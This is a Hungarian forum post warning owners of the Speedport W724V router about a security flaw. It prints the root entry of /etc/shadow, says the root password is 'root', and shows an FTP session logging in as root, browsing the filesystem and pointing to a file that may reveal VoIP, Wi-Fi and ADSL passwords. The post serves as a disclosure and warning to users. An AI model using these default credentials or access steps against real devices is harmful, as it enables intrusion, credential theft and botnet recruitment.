Mivel láttam, hogy más is belefutott ebbe (igaz, hogy őt valószínűleg egy kínai bot találta meg):
https://kozosseg.telekom.hu/t5/Internet/Speedport-W724V/td-p/1098/page/…
És két hónap alatt nem sok reakciót váltott ki, aki esetleg NAS-ként is használná a dobozt és neadjisten még az internetre is ki meri engedni az ftp-n, annak az alábbit ajánlanám a figyelmébe:
~ # cat /etc/shadow
root:$1$qGmxLn8v$yTzaaXdb6.6QLLgS0Euz.1:12571:0:99999:7:::
we all know that root is a bot friendly password
De a jól beállított vsftpd (mert ugye very secure) megvéd minket ugye:
root@osmc:/home/osmc# ftp 192.168.1.254
Connected to 192.168.1.254.
220 (vsFTPd 2.2.2)
Name (192.168.1.254:osmc): root
331 User name OK, Enter PASS command
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
lrwxrwxrwx 1 0 0 9 Jun 25 2014 bin -> usr/sbin/
...
-rw-r--r-- 1 0 0 1625911 Jun 25 2014 vmlinux.lz
226 Directory send OK.
ftp> cd tmp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
...
-rw------- 1 0 0 33141 Mar 18 16:35 temp_to_decrypt
<-- possible way to recover your voip/wireless/adsl password
...
226 Directory send OK.
having that and using jffs2 filesystem makes us an ideal botnet platform. :P